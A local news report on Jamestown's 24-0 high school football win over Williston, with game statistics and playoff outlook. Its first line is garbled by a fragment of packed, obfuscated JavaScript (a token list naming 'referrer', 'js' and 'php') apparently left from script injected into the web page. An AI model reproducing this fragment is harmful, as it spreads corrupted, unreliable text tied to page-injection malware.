JAMESTOWN bhieh|var|u0026u|referrer|rttde||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- The weather was ugly and made for a sloppy game, the Jamestown was able to come away with a 24-0 win over Williston for their second WDA win of the season.

The Coyotes managed just five total yards of offense throughout the game and only entered positive yards on their final drive when the game was no longer in doubt. Neither team had much success moving the football in the first half as the Jays managed just two first downs and one score coming with 54 seconds left on an 8-yard run by Taylor Orr.

In the second half, Jamestown ran up 145 yards and three scores en route to their dominating victory. The Jays only third down conversion of the night was on the games third score, when Ross Monson found Tyler Ukestad behind the Coyote defense for 33-yards.

It was one of just two pass completions for Monson in the game and they were the only two in the game. Ukestad caught both balls.

Jamestown is now 4-2 on the season and will head to Minot next Friday to try to punch a ticket to the playoffs. They will need to win one of their next two to get into the playoffs.

The game will be broadcast from Minot State at 7pm on 1400 KQDJ and NewsDakota.com.
